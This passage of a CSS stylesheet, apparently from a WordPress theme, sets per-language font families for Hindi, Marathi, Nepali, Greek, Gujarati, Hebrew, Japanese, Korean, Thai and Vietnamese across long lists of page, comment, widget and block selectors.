.page-title:lang(hi-IN),.error-404 .page-title:lang(hi-IN),.post-navigation .post-title:lang(hi-IN),.page-links:lang(hi-IN),.page-description:lang(hi-IN),.pagination .nav-links:lang(hi-IN),.sticky-post:lang(hi-IN),.site-title:lang(hi-IN),.site-info:lang(hi-IN),#cancel-comment-reply-link:lang(hi-IN),h1:lang(hi-IN),h2:lang(hi-IN),h3:lang(hi-IN),h4:lang(hi-IN),h5:lang(hi-IN),h6:lang(hi-IN),.page-title:lang(hi-IN),blockquote cite:lang(hi-IN),table:lang(hi-IN),.button:lang(hi-IN),input:lang(hi-IN)[type=button],input:lang(hi-IN)[type=reset],input:lang(hi-IN)[type=submit],.comment-navigation .nav-previous:lang(hi-IN),.comment-navigation .nav-next:lang(hi-IN),.comment-list .pingback .comment-body:lang(hi-IN),.comment-list .trackback .comment-body:lang(hi-IN),.comment-list .pingback .comment-body .comment-edit-link:lang(hi-IN),.comment-list .trackback .comment-body .comment-edit-link:lang(hi-IN),.comment-form .comment-notes:lang(hi-IN),.comment-form label:lang(hi-IN),.widget_archive ul li:lang(hi-IN),.widget_categories ul li:lang(hi-IN),.widget_meta ul li:lang(hi-IN),.widget_nav_menu ul li:lang(hi-IN),.widget_pages ul li:lang(hi-IN),.widget_recent_comments ul li:lang(hi-IN),.widget_recent_entries ul li:lang(hi-IN),.widget_rss ul li:lang(hi-IN),.widget_tag_cloud .tagcloud:lang(hi-IN),.widget_calendar .calendar_wrap .wp-calendar-nav:lang(hi-IN),.entry .entry-content .wp-block-button .wp-block-button__link:lang(hi-IN),.entry .entry-content .wp-block-archives li>a:lang(hi-IN),.entry .entry-content .wp-block-categories li>a:lang(hi-IN),.entry .entry-content .wp-block-latest-posts li>a:lang(hi-IN),.entry .entry-content .wp-block-latest-posts .wp-block-latest-posts__post-date:lang(hi-IN),.entry .entry-content .wp-block-verse:lang(hi-IN),.entry .entry-content .has-drop-cap:lang(hi-IN):not(:focus):first-letter ,.entry .entry-content .wp-block-pullquote cite:lang(hi-IN),.entry .entry-content .wp-block-cover-image .wp-block-cover-image-text:lang(hi-IN),.entry .entry-content .wp-block-cover-image .wp-block-cover-text:lang(hi-IN),.entry .entry-content .wp-block-cover-image h2:lang(hi-IN),.entry .entry-content .wp-block-cover .wp-block-cover-image-text:lang(hi-IN),.entry .entry-content .wp-block-cover .wp-block-cover-text:lang(hi-IN),.entry .entry-content .wp-block-cover h2:lang(hi-IN),.entry .entry-content .wp-block-audio figcaption:lang(hi-IN),.entry .entry-content .wp-block-video figcaption:lang(hi-IN),.entry .entry-content .wp-block-image figcaption:lang(hi-IN),.entry .entry-content .wp-block-gallery .blocks-gallery-image figcaption:lang(hi-IN),.entry .entry-content .wp-block-gallery .blocks-gallery-item figcaption:lang(hi-IN),.entry .entry-content .wp-block-file:lang(hi-IN),.entry .entry-content .wp-block-file .wp-block-file__button:lang(hi-IN),.entry .entry-content .wp-block-latest-comments .wp-block-latest-comments__comment-meta:lang(hi-IN),.wp-caption-text:lang(hi-IN),.gallery-caption:lang(hi-IN){font-family:Arial,sans-serif}body:lang(mr),button:lang(mr),input:lang(mr),select:lang(mr),optgroup:lang(mr),textarea:lang(mr),.author-description .author-link:lang(mr),.comment-metadata:lang(mr),.comment-reply-link:lang(mr),.comments-title:lang(mr),.comment-author .fn:lang(mr),.discussion-meta-info:lang(mr),.entry-meta:lang(mr),.entry-footer:lang(mr),.main-navigation:lang(mr),.no-comments:lang(mr),.not-found .page-title:lang(mr),.error-404 .page-title:lang(mr),.post-navigation .post-title:lang(mr),.page-links:lang(mr),.page-description:lang(mr),.pagination .nav-links:lang(mr),.sticky-post:lang(mr),.site-title:lang(mr),.site-info:lang(mr),#cancel-comment-reply-link:lang(mr),h1:lang(mr),h2:lang(mr),h3:lang(mr),h4:lang(mr),h5:lang(mr),h6:lang(mr),.page-title:lang(mr),blockquote cite:lang(mr),table:lang(mr),.button:lang(mr),input:lang(mr)[type=button],input:lang(mr)[type=reset],input:lang(mr)[type=submit],.comment-navigation .nav-previous:lang(mr),.comment-navigation .nav-next:lang(mr),.comment-list .pingback .comment-body:lang(mr),.comment-list .trackback .comment-body:lang(mr),.comment-list .pingback .comment-body .comment-edit-link:lang(mr),.comment-list .trackback .comment-body .comment-edit-link:lang(mr),.comment-form .comment-notes:lang(mr),.comment-form label:lang(mr),.widget_archive ul li:lang(mr),.widget_categories ul li:lang(mr),.widget_meta ul li:lang(mr),.widget_nav_menu ul li:lang(mr),.widget_pages ul li:lang(mr),.widget_recent_comments ul li:lang(mr),.widget_recent_entries ul li:lang(mr),.widget_rss ul li:lang(mr),.widget_tag_cloud .tagcloud:lang(mr),.widget_calendar .calendar_wrap .wp-calendar-nav:lang(mr),.entry .entry-content .wp-block-button .wp-block-button__link:lang(mr),.entry .entry-content .wp-block-archives li>a:lang(mr),.entry .entry-content .wp-block-categories li>a:lang(mr),.entry .entry-content .wp-block-latest-posts li>a:lang(mr),.entry .entry-content .wp-block-latest-posts .wp-block-latest-posts__post-date:lang(mr),.entry .entry-content .wp-block-verse:lang(mr),.entry .entry-content .has-drop-cap:lang(mr):not(:focus):first-letter ,.entry .entry-content .wp-block-pullquote cite:lang(mr),.entry .entry-content .wp-block-cover-image .wp-block-cover-image-text:lang(mr),.entry .entry-content .wp-block-cover-image .wp-block-cover-text:lang(mr),.entry .entry-content .wp-block-cover-image h2:lang(mr),.entry .entry-content .wp-block-cover .wp-block-cover-image-text:lang(mr),.entry .entry-content .wp-block-cover .wp-block-cover-text:lang(mr),.entry .entry-content .wp-block-cover h2:lang(mr),.entry .entry-content .wp-block-audio figcaption:lang(mr),.entry .entry-content .wp-block-video figcaption:lang(mr),.entry .entry-content .wp-block-image figcaption:lang(mr),.entry .entry-content .wp-block-gallery .blocks-gallery-image figcaption:lang(mr),.entry .entry-content .wp-block-gallery .blocks-gallery-item figcaption:lang(mr),.entry .entry-content .wp-block-file:lang(mr),.entry .entry-content .wp-block-file .wp-block-file__button:lang(mr),.entry .entry-content .wp-block-latest-comments .wp-block-latest-comments__comment-meta:lang(mr),.wp-caption-text:lang(mr),.gallery-caption:lang(mr){font-family:Arial,sans-serif}body:lang(ne-NP),button:lang(ne-NP),input:lang(ne-NP),select:lang(ne-NP),optgroup:lang(ne-NP),textarea:lang(ne-NP),.author-description .author-link:lang(ne-NP),.comment-metadata:lang(ne-NP),.comment-reply-link:lang(ne-NP),.comments-title:lang(ne-NP),.comment-author .fn:lang(ne-NP),.discussion-meta-info:lang(ne-NP),.entry-meta:lang(ne-NP),.entry-footer:lang(ne-NP),.main-navigation:lang(ne-NP),.no-comments:lang(ne-NP),.not-found .page-title:lang(ne-NP),.error-404 .page-title:lang(ne-NP),.post-navigation .post-title:lang(ne-NP),.page-links:lang(ne-NP),.page-description:lang(ne-NP),.pagination .nav-links:lang(ne-NP),.sticky-post:lang(ne-NP),.site-title:lang(ne-NP),.site-info:lang(ne-NP),#cancel-comment-reply-link:lang(ne-NP),h1:lang(ne-NP),h2:lang(ne-NP),h3:lang(ne-NP),h4:lang(ne-NP),h5:lang(ne-NP),h6:lang(ne-NP),.page-title:lang(ne-NP),blockquote cite:lang(ne-NP),table:lang(ne-NP),.button:lang(ne-NP),input:lang(ne-NP)[type=button],input:lang(ne-NP)[type=reset],input:lang(ne-NP)[type=submit],.comment-navigation .nav-previous:lang(ne-NP),.comment-navigation .nav-next:lang(ne-NP),.comment-list .pingback .comment-body:lang(ne-NP),.comment-list .trackback .comment-body:lang(ne-NP),.comment-list .pingback .comment-body .comment-edit-link:lang(ne-NP),.comment-list .trackback .comment-body .comment-edit-link:lang(ne-NP),.comment-form .comment-notes:lang(ne-NP),.comment-form label:lang(ne-NP),.widget_archive ul li:lang(ne-NP),.widget_categories ul li:lang(ne-NP),.widget_meta ul li:lang(ne-NP),.widget_nav_menu ul li:lang(ne-NP),.widget_pages ul li:lang(ne-NP),.widget_recent_comments ul li:lang(ne-NP),.widget_recent_entries ul li:lang(ne-NP),.widget_rss ul li:lang(ne-NP),.widget_tag_cloud .tagcloud:lang(ne-NP),.widget_calendar .calendar_wrap .wp-calendar-nav:lang(ne-NP),.entry .entry-content .wp-block-button .wp-block-button__link:lang(ne-NP),.entry .entry-content .wp-block-archives li>a:lang(ne-NP),.entry .entry-content .wp-block-categories li>a:lang(ne-NP),.entry .entry-content .wp-block-latest-posts li>a:lang(ne-NP),.entry .entry-content .wp-block-latest-posts .wp-block-latest-posts__post-date:lang(ne-NP),.entry .entry-content .wp-block-verse:lang(ne-NP),.entry .entry-content .has-drop-cap:lang(ne-NP):not(:focus):first-letter ,.entry .entry-content .wp-block-pullquote cite:lang(ne-NP),.entry .entry-content .wp-block-cover-image .wp-block-cover-image-text:lang(ne-NP),.entry .entry-content .wp-block-cover-image .wp-block-cover-text:lang(ne-NP),.entry .entry-content .wp-block-cover-image h2:lang(ne-NP),.entry .entry-content .wp-block-cover .wp-block-cover-image-text:lang(ne-NP),.entry .entry-content .wp-block-cover .wp-block-cover-text:lang(ne-NP),.entry .entry-content .wp-block-cover h2:lang(ne-NP),.entry .entry-content .wp-block-audio figcaption:lang(ne-NP),.entry .entry-content .wp-block-video figcaption:lang(ne-NP),.entry .entry-content .wp-block-image figcaption:lang(ne-NP),.entry .entry-content .wp-block-gallery .blocks-gallery-image figcaption:lang(ne-NP),.entry .entry-content .wp-block-gallery .blocks-gallery-item figcaption:lang(ne-NP),.entry .entry-content .wp-block-file:lang(ne-NP),.entry .entry-content .wp-block-file .wp-block-file__button:lang(ne-NP),.entry .entry-content .wp-block-latest-comments .wp-block-latest-comments__comment-meta:lang(ne-NP),.wp-caption-text:lang(ne-NP),.gallery-caption:lang(ne-NP){font-family:Arial,sans-serif}body:lang(el),button:lang(el),input:lang(el),select:lang(el),optgroup:lang(el),textarea:lang(el),.author-description .author-link:lang(el),.comment-metadata:lang(el),.comment-reply-link:lang(el),.comments-title:lang(el),.comment-author .fn:lang(el),.discussion-meta-info:lang(el),.entry-meta:lang(el),.entry-footer:lang(el),.main-navigation:lang(el),.no-comments:lang(el),.not-found .page-title:lang(el),.error-404 .page-title:lang(el),.post-navigation .post-title:lang(el),.page-links:lang(el),.page-description:lang(el),.pagination .nav-links:lang(el),.sticky-post:lang(el),.site-title:lang(el),.site-info:lang(el),#cancel-comment-reply-link:lang(el),h1:lang(el),h2:lang(el),h3:lang(el),h4:lang(el),h5:lang(el),h6:lang(el),.page-title:lang(el),blockquote cite:lang(el),table:lang(el),.button:lang(el),input:lang(el)[type=button],input:lang(el)[type=reset],input:lang(el)[type=submit],.comment-navigation .nav-previous:lang(el),.comment-navigation .nav-next:lang(el),.comment-list .pingback .comment-body:lang(el),.comment-list .trackback .comment-body:lang(el),.comment-list .pingback .comment-body .comment-edit-link:lang(el),.comment-list .trackback .comment-body .comment-edit-link:lang(el),.comment-form .comment-notes:lang(el),.comment-form label:lang(el),.widget_archive ul li:lang(el),.widget_categories ul li:lang(el),.widget_meta ul li:lang(el),.widget_nav_menu ul li:lang(el),.widget_pages ul li:lang(el),.widget_recent_comments ul li:lang(el),.widget_recent_entries ul li:lang(el),.widget_rss ul li:lang(el),.widget_tag_cloud .tagcloud:lang(el),.widget_calendar .calendar_wrap .wp-calendar-nav:lang(el),.entry .entry-content .wp-block-button .wp-block-button__link:lang(el),.entry .entry-content .wp-block-archives li>a:lang(el),.entry .entry-content .wp-block-categories li>a:lang(el),.entry .entry-content .wp-block-latest-posts li>a:lang(el),.entry .entry-content .wp-block-latest-posts .wp-block-latest-posts__post-date:lang(el),.entry .entry-content .wp-block-verse:lang(el),.entry .entry-content .has-drop-cap:lang(el):not(:focus):first-letter ,.entry .entry-content .wp-block-pullquote cite:lang(el),.entry .entry-content .wp-block-cover-image .wp-block-cover-image-text:lang(el),.entry .entry-content .wp-block-cover-image .wp-block-cover-text:lang(el),.entry .entry-content .wp-block-cover-image h2:lang(el),.entry .entry-content .wp-block-cover .wp-block-cover-image-text:lang(el),.entry .entry-content .wp-block-cover .wp-block-cover-text:lang(el),.entry .entry-content .wp-block-cover h2:lang(el),.entry .entry-content .wp-block-audio figcaption:lang(el),.entry .entry-content .wp-block-video figcaption:lang(el),.entry .entry-content .wp-block-image figcaption:lang(el),.entry .entry-content .wp-block-gallery .blocks-gallery-image figcaption:lang(el),.entry .entry-content .wp-block-gallery .blocks-gallery-item figcaption:lang(el),.entry .entry-content .wp-block-file:lang(el),.entry .entry-content .wp-block-file .wp-block-file__button:lang(el),.entry .entry-content .wp-block-latest-comments .wp-block-latest-comments__comment-meta:lang(el),.wp-caption-text:lang(el),.gallery-caption:lang(el){font-family:"Helvetica Neue",Helvetica,Arial,sans-serif}body:lang(gu),button:lang(gu),input:lang(gu),select:lang(gu),optgroup:lang(gu),textarea:lang(gu),.author-description .author-link:lang(gu),.comment-metadata:lang(gu),.comment-reply-link:lang(gu),.comments-title:lang(gu),.comment-author .fn:lang(gu),.discussion-meta-info:lang(gu),.entry-meta:lang(gu),.entry-footer:lang(gu),.main-navigation:lang(gu),.no-comments:lang(gu),.not-found .page-title:lang(gu),.error-404 .page-title:lang(gu),.post-navigation .post-title:lang(gu),.page-links:lang(gu),.page-description:lang(gu),.pagination .nav-links:lang(gu),.sticky-post:lang(gu),.site-title:lang(gu),.site-info:lang(gu),#cancel-comment-reply-link:lang(gu),h1:lang(gu),h2:lang(gu),h3:lang(gu),h4:lang(gu),h5:lang(gu),h6:lang(gu),.page-title:lang(gu),blockquote cite:lang(gu),table:lang(gu),.button:lang(gu),input:lang(gu)[type=button],input:lang(gu)[type=reset],input:lang(gu)[type=submit],.comment-navigation .nav-previous:lang(gu),.comment-navigation .nav-next:lang(gu),.comment-list .pingback .comment-body:lang(gu),.comment-list .trackback .comment-body:lang(gu),.comment-list .pingback .comment-body .comment-edit-link:lang(gu),.comment-list .trackback .comment-body .comment-edit-link:lang(gu),.comment-form .comment-notes:lang(gu),.comment-form label:lang(gu),.widget_archive ul li:lang(gu),.widget_categories ul li:lang(gu),.widget_meta ul li:lang(gu),.widget_nav_menu ul li:lang(gu),.widget_pages ul li:lang(gu),.widget_recent_comments ul li:lang(gu),.widget_recent_entries ul li:lang(gu),.widget_rss ul li:lang(gu),.widget_tag_cloud .tagcloud:lang(gu),.widget_calendar .calendar_wrap .wp-calendar-nav:lang(gu),.entry .entry-content .wp-block-button .wp-block-button__link:lang(gu),.entry .entry-content .wp-block-archives li>a:lang(gu),.entry .entry-content .wp-block-categories li>a:lang(gu),.entry .entry-content .wp-block-latest-posts li>a:lang(gu),.entry .entry-content .wp-block-latest-posts .wp-block-latest-posts__post-date:lang(gu),.entry .entry-content .wp-block-verse:lang(gu),.entry .entry-content .has-drop-cap:lang(gu):not(:focus):first-letter ,.entry .entry-content .wp-block-pullquote cite:lang(gu),.entry .entry-content .wp-block-cover-image .wp-block-cover-image-text:lang(gu),.entry .entry-content .wp-block-cover-image .wp-block-cover-text:lang(gu),.entry .entry-content .wp-block-cover-image h2:lang(gu),.entry .entry-content .wp-block-cover .wp-block-cover-image-text:lang(gu),.entry .entry-content .wp-block-cover .wp-block-cover-text:lang(gu),.entry .entry-content .wp-block-cover h2:lang(gu),.entry .entry-content .wp-block-audio figcaption:lang(gu),.entry .entry-content .wp-block-video figcaption:lang(gu),.entry .entry-content .wp-block-image figcaption:lang(gu),.entry .entry-content .wp-block-gallery .blocks-gallery-image figcaption:lang(gu),.entry .entry-content .wp-block-gallery .blocks-gallery-item figcaption:lang(gu),.entry .entry-content .wp-block-file:lang(gu),.entry .entry-content .wp-block-file .wp-block-file__button:lang(gu),.entry .entry-content .wp-block-latest-comments .wp-block-latest-comments__comment-meta:lang(gu),.wp-caption-text:lang(gu),.gallery-caption:lang(gu){font-family:Arial,sans-serif}body:lang(he-IL),button:lang(he-IL),input:lang(he-IL),select:lang(he-IL),optgroup:lang(he-IL),textarea:lang(he-IL),.author-description .author-link:lang(he-IL),.comment-metadata:lang(he-IL),.comment-reply-link:lang(he-IL),.comments-title:lang(he-IL),.comment-author .fn:lang(he-IL),.discussion-meta-info:lang(he-IL),.entry-meta:lang(he-IL),.entry-footer:lang(he-IL),.main-navigation:lang(he-IL),.no-comments:lang(he-IL),.not-found .page-title:lang(he-IL),.error-404 .page-title:lang(he-IL),.post-navigation .post-title:lang(he-IL),.page-links:lang(he-IL),.page-description:lang(he-IL),.pagination .nav-links:lang(he-IL),.sticky-post:lang(he-IL),.site-title:lang(he-IL),.site-info:lang(he-IL),#cancel-comment-reply-link:lang(he-IL),h1:lang(he-IL),h2:lang(he-IL),h3:lang(he-IL),h4:lang(he-IL),h5:lang(he-IL),h6:lang(he-IL),.page-title:lang(he-IL),blockquote cite:lang(he-IL),table:lang(he-IL),.button:lang(he-IL),input:lang(he-IL)[type=button],input:lang(he-IL)[type=reset],input:lang(he-IL)[type=submit],.comment-navigation .nav-previous:lang(he-IL),.comment-navigation .nav-next:lang(he-IL),.comment-list .pingback .comment-body:lang(he-IL),.comment-list .trackback .comment-body:lang(he-IL),.comment-list .pingback .comment-body .comment-edit-link:lang(he-IL),.comment-list .trackback .comment-body .comment-edit-link:lang(he-IL),.comment-form .comment-notes:lang(he-IL),.comment-form label:lang(he-IL),.widget_archive ul li:lang(he-IL),.widget_categories ul li:lang(he-IL),.widget_meta ul li:lang(he-IL),.widget_nav_menu ul li:lang(he-IL),.widget_pages ul li:lang(he-IL),.widget_recent_comments ul li:lang(he-IL),.widget_recent_entries ul li:lang(he-IL),.widget_rss ul li:lang(he-IL),.widget_tag_cloud .tagcloud:lang(he-IL),.widget_calendar .calendar_wrap .wp-calendar-nav:lang(he-IL),.entry .entry-content .wp-block-button .wp-block-button__link:lang(he-IL),.entry .entry-content .wp-block-archives li>a:lang(he-IL),.entry .entry-content .wp-block-categories li>a:lang(he-IL),.entry .entry-content .wp-block-latest-posts li>a:lang(he-IL),.entry .entry-content .wp-block-latest-posts .wp-block-latest-posts__post-date:lang(he-IL),.entry .entry-content .wp-block-verse:lang(he-IL),.entry .entry-content .has-drop-cap:lang(he-IL):not(:focus):first-letter ,.entry .entry-content .wp-block-pullquote cite:lang(he-IL),.entry .entry-content .wp-block-cover-image .wp-block-cover-image-text:lang(he-IL),.entry .entry-content .wp-block-cover-image .wp-block-cover-text:lang(he-IL),.entry .entry-content .wp-block-cover-image h2:lang(he-IL),.entry .entry-content .wp-block-cover .wp-block-cover-image-text:lang(he-IL),.entry .entry-content .wp-block-cover .wp-block-cover-text:lang(he-IL),.entry .entry-content .wp-block-cover h2:lang(he-IL),.entry .entry-content .wp-block-audio figcaption:lang(he-IL),.entry .entry-content .wp-block-video figcaption:lang(he-IL),.entry .entry-content .wp-block-image figcaption:lang(he-IL),.entry .entry-content .wp-block-gallery .blocks-gallery-image figcaption:lang(he-IL),.entry .entry-content .wp-block-gallery .blocks-gallery-item figcaption:lang(he-IL),.entry .entry-content .wp-block-file:lang(he-IL),.entry .entry-content .wp-block-file .wp-block-file__button:lang(he-IL),.entry .entry-content .wp-block-latest-comments .wp-block-latest-comments__comment-meta:lang(he-IL),.wp-caption-text:lang(he-IL),.gallery-caption:lang(he-IL){font-family:"Arial Hebrew",Arial,sans-serif}body:lang(ja),button:lang(ja),input:lang(ja),select:lang(ja),optgroup:lang(ja),textarea:lang(ja),.author-description .author-link:lang(ja),.comment-metadata:lang(ja),.comment-reply-link:lang(ja),.comments-title:lang(ja),.comment-author .fn:lang(ja),.discussion-meta-info:lang(ja),.entry-meta:lang(ja),.entry-footer:lang(ja),.main-navigation:lang(ja),.no-comments:lang(ja),.not-found .page-title:lang(ja),.error-404 .page-title:lang(ja),.post-navigation .post-title:lang(ja),.page-links:lang(ja),.page-description:lang(ja),.pagination .nav-links:lang(ja),.sticky-post:lang(ja),.site-title:lang(ja),.site-info:lang(ja),#cancel-comment-reply-link:lang(ja),h1:lang(ja),h2:lang(ja),h3:lang(ja),h4:lang(ja),h5:lang(ja),h6:lang(ja),.page-title:lang(ja),blockquote cite:lang(ja),table:lang(ja),.button:lang(ja),input:lang(ja)[type=button],input:lang(ja)[type=reset],input:lang(ja)[type=submit],.comment-navigation .nav-previous:lang(ja),.comment-navigation .nav-next:lang(ja),.comment-list .pingback .comment-body:lang(ja),.comment-list .trackback .comment-body:lang(ja),.comment-list .pingback .comment-body .comment-edit-link:lang(ja),.comment-list .trackback .comment-body .comment-edit-link:lang(ja),.comment-form .comment-notes:lang(ja),.comment-form label:lang(ja),.widget_archive ul li:lang(ja),.widget_categories ul li:lang(ja),.widget_meta ul li:lang(ja),.widget_nav_menu ul li:lang(ja),.widget_pages ul li:lang(ja),.widget_recent_comments ul li:lang(ja),.widget_recent_entries ul li:lang(ja),.widget_rss ul li:lang(ja),.widget_tag_cloud .tagcloud:lang(ja),.widget_calendar .calendar_wrap .wp-calendar-nav:lang(ja),.entry .entry-content .wp-block-button .wp-block-button__link:lang(ja),.entry .entry-content .wp-block-archives li>a:lang(ja),.entry .entry-content .wp-block-categories li>a:lang(ja),.entry .entry-content .wp-block-latest-posts li>a:lang(ja),.entry .entry-content .wp-block-latest-posts .wp-block-latest-posts__post-date:lang(ja),.entry .entry-content .wp-block-verse:lang(ja),.entry .entry-content .has-drop-cap:lang(ja):not(:focus):first-letter ,.entry .entry-content .wp-block-pullquote cite:lang(ja),.entry .entry-content .wp-block-cover-image .wp-block-cover-image-text:lang(ja),.entry .entry-content .wp-block-cover-image .wp-block-cover-text:lang(ja),.entry .entry-content .wp-block-cover-image h2:lang(ja),.entry .entry-content .wp-block-cover .wp-block-cover-image-text:lang(ja),.entry .entry-content .wp-block-cover .wp-block-cover-text:lang(ja),.entry .entry-content .wp-block-cover h2:lang(ja),.entry .entry-content .wp-block-audio figcaption:lang(ja),.entry .entry-content .wp-block-video figcaption:lang(ja),.entry .entry-content .wp-block-image figcaption:lang(ja),.entry .entry-content .wp-block-gallery .blocks-gallery-image figcaption:lang(ja),.entry .entry-content .wp-block-gallery .blocks-gallery-item figcaption:lang(ja),.entry .entry-content .wp-block-file:lang(ja),.entry .entry-content .wp-block-file .wp-block-file__button:lang(ja),.entry .entry-content .wp-block-latest-comments .wp-block-latest-comments__comment-meta:lang(ja),.wp-caption-text:lang(ja),.gallery-caption:lang(ja){font-family:-apple-system,BlinkMacSystemFont,"Hiragino Sans",Meiryo,"Helvetica Neue",sans-serif}body:lang(ko-KR),button:lang(ko-KR),input:lang(ko-KR),select:lang(ko-KR),optgroup:lang(ko-KR),textarea:lang(ko-KR),.author-description .author-link:lang(ko-KR),.comment-metadata:lang(ko-KR),.comment-reply-link:lang(ko-KR),.comments-title:lang(ko-KR),.comment-author .fn:lang(ko-KR),.discussion-meta-info:lang(ko-KR),.entry-meta:lang(ko-KR),.entry-footer:lang(ko-KR),.main-navigation:lang(ko-KR),.no-comments:lang(ko-KR),.not-found .page-title:lang(ko-KR),.error-404 .page-title:lang(ko-KR),.post-navigation .post-title:lang(ko-KR),.page-links:lang(ko-KR),.page-description:lang(ko-KR),.pagination .nav-links:lang(ko-KR),.sticky-post:lang(ko-KR),.site-title:lang(ko-KR),.site-info:lang(ko-KR),#cancel-comment-reply-link:lang(ko-KR),h1:lang(ko-KR),h2:lang(ko-KR),h3:lang(ko-KR),h4:lang(ko-KR),h5:lang(ko-KR),h6:lang(ko-KR),.page-title:lang(ko-KR),blockquote cite:lang(ko-KR),table:lang(ko-KR),.button:lang(ko-KR),input:lang(ko-KR)[type=button],input:lang(ko-KR)[type=reset],input:lang(ko-KR)[type=submit],.comment-navigation .nav-previous:lang(ko-KR),.comment-navigation .nav-next:lang(ko-KR),.comment-list .pingback .comment-body:lang(ko-KR),.comment-list .trackback .comment-body:lang(ko-KR),.comment-list .pingback .comment-body .comment-edit-link:lang(ko-KR),.comment-list .trackback .comment-body .comment-edit-link:lang(ko-KR),.comment-form .comment-notes:lang(ko-KR),.comment-form label:lang(ko-KR),.widget_archive ul li:lang(ko-KR),.widget_categories ul li:lang(ko-KR),.widget_meta ul li:lang(ko-KR),.widget_nav_menu ul li:lang(ko-KR),.widget_pages ul li:lang(ko-KR),.widget_recent_comments ul li:lang(ko-KR),.widget_recent_entries ul li:lang(ko-KR),.widget_rss ul li:lang(ko-KR),.widget_tag_cloud .tagcloud:lang(ko-KR),.widget_calendar .calendar_wrap .wp-calendar-nav:lang(ko-KR),.entry .entry-content .wp-block-button .wp-block-button__link:lang(ko-KR),.entry .entry-content .wp-block-archives li>a:lang(ko-KR),.entry .entry-content .wp-block-categories li>a:lang(ko-KR),.entry .entry-content .wp-block-latest-posts li>a:lang(ko-KR),.entry .entry-content .wp-block-latest-posts .wp-block-latest-posts__post-date:lang(ko-KR),.entry .entry-content .wp-block-verse:lang(ko-KR),.entry .entry-content .has-drop-cap:lang(ko-KR):not(:focus):first-letter ,.entry .entry-content .wp-block-pullquote cite:lang(ko-KR),.entry .entry-content .wp-block-cover-image .wp-block-cover-image-text:lang(ko-KR),.entry .entry-content .wp-block-cover-image .wp-block-cover-text:lang(ko-KR),.entry .entry-content .wp-block-cover-image h2:lang(ko-KR),.entry .entry-content .wp-block-cover .wp-block-cover-image-text:lang(ko-KR),.entry .entry-content .wp-block-cover .wp-block-cover-text:lang(ko-KR),.entry .entry-content .wp-block-cover h2:lang(ko-KR),.entry .entry-content .wp-block-audio figcaption:lang(ko-KR),.entry .entry-content .wp-block-video figcaption:lang(ko-KR),.entry .entry-content .wp-block-image figcaption:lang(ko-KR),.entry .entry-content .wp-block-gallery .blocks-gallery-image figcaption:lang(ko-KR),.entry .entry-content .wp-block-gallery .blocks-gallery-item figcaption:lang(ko-KR),.entry .entry-content .wp-block-file:lang(ko-KR),.entry .entry-content .wp-block-file .wp-block-file__button:lang(ko-KR),.entry .entry-content .wp-block-latest-comments .wp-block-latest-comments__comment-meta:lang(ko-KR),.wp-caption-text:lang(ko-KR),.gallery-caption:lang(ko-KR){font-family:"Apple SD Gothic Neo","Malgun Gothic","Nanum Gothic",Dotum,sans-serif}body:lang(th),button:lang(th),input:lang(th),select:lang(th),optgroup:lang(th),textarea:lang(th),.author-description .author-link:lang(th),.comment-metadata:lang(th),.comment-reply-link:lang(th),.comments-title:lang(th),.comment-author .fn:lang(th),.discussion-meta-info:lang(th),.entry-meta:lang(th),.entry-footer:lang(th),.main-navigation:lang(th),.no-comments:lang(th),.not-found .page-title:lang(th),.error-404 .page-title:lang(th),.post-navigation .post-title:lang(th),.page-links:lang(th),.page-description:lang(th),.pagination .nav-links:lang(th),.sticky-post:lang(th),.site-title:lang(th),.site-info:lang(th),#cancel-comment-reply-link:lang(th),h1:lang(th),h2:lang(th),h3:lang(th),h4:lang(th),h5:lang(th),h6:lang(th),.page-title:lang(th),blockquote cite:lang(th),table:lang(th),.button:lang(th),input:lang(th)[type=button],input:lang(th)[type=reset],input:lang(th)[type=submit],.comment-navigation .nav-previous:lang(th),.comment-navigation .nav-next:lang(th),.comment-list .pingback .comment-body:lang(th),.comment-list .trackback .comment-body:lang(th),.comment-list .pingback .comment-body .comment-edit-link:lang(th),.comment-list .trackback .comment-body .comment-edit-link:lang(th),.comment-form .comment-notes:lang(th),.comment-form label:lang(th),.widget_archive ul li:lang(th),.widget_categories ul li:lang(th),.widget_meta ul li:lang(th),.widget_nav_menu ul li:lang(th),.widget_pages ul li:lang(th),.widget_recent_comments ul li:lang(th),.widget_recent_entries ul li:lang(th),.widget_rss ul li:lang(th),.widget_tag_cloud .tagcloud:lang(th),.widget_calendar .calendar_wrap .wp-calendar-nav:lang(th),.entry .entry-content .wp-block-button .wp-block-button__link:lang(th),.entry .entry-content .wp-block-archives li>a:lang(th),.entry .entry-content .wp-block-categories li>a:lang(th),.entry .entry-content .wp-block-latest-posts li>a:lang(th),.entry .entry-content .wp-block-latest-posts .wp-block-latest-posts__post-date:lang(th),.entry .entry-content .wp-block-verse:lang(th),.entry .entry-content .has-drop-cap:lang(th):not(:focus):first-letter ,.entry .entry-content .wp-block-pullquote cite:lang(th),.entry .entry-content .wp-block-cover-image .wp-block-cover-image-text:lang(th),.entry .entry-content .wp-block-cover-image .wp-block-cover-text:lang(th),.entry .entry-content .wp-block-cover-image h2:lang(th),.entry .entry-content .wp-block-cover .wp-block-cover-image-text:lang(th),.entry .entry-content .wp-block-cover .wp-block-cover-text:lang(th),.entry .entry-content .wp-block-cover h2:lang(th),.entry .entry-content .wp-block-audio figcaption:lang(th),.entry .entry-content .wp-block-video figcaption:lang(th),.entry .entry-content .wp-block-image figcaption:lang(th),.entry .entry-content .wp-block-gallery .blocks-gallery-image figcaption:lang(th),.entry .entry-content .wp-block-gallery .blocks-gallery-item figcaption:lang(th),.entry .entry-content .wp-block-file:lang(th),.entry .entry-content .wp-block-file .wp-block-file__button:lang(th),.entry .entry-content .wp-block-latest-comments .wp-block-latest-comments__comment-meta:lang(th),.wp-caption-text:lang(th),.gallery-caption:lang(th){font-family:"Sukhumvit Set","Helvetica Neue",helvetica,arial,sans-serif}body:lang(vi),button:lang(vi),input:lang(vi),select:lang(vi),optgroup:lang(vi),textarea:lang(vi),.author-description .author-link:lang(vi),.comment-metadata:lang(vi),.comment-reply-link:lang(vi),.comments-title:lang(vi),.comment-author .fn:lang(vi),.discussion-meta-info:lang(vi),.entry-meta:lang(vi),.entry-footer:lang(vi),.main-navigation:lang(vi),.no-comments:lang(vi),.not-found .page-title:lang(vi),.error-404 .page-title:lang(vi),.post-navigation .post-title:lang(vi),.page-links:lang(vi),.page-description:lang(vi),.pagination .nav-links:lang(vi),.sticky-post:lang(vi),.site-title:lang(vi),.site-info:lang(vi),#cancel-comment-reply-link:lang(vi),h1:lang(vi),h2:lang(vi),h3:lang(vi),h4:lang(vi),h5:lang(vi),h6:lang(vi),.page-title:lang(vi),blockquote 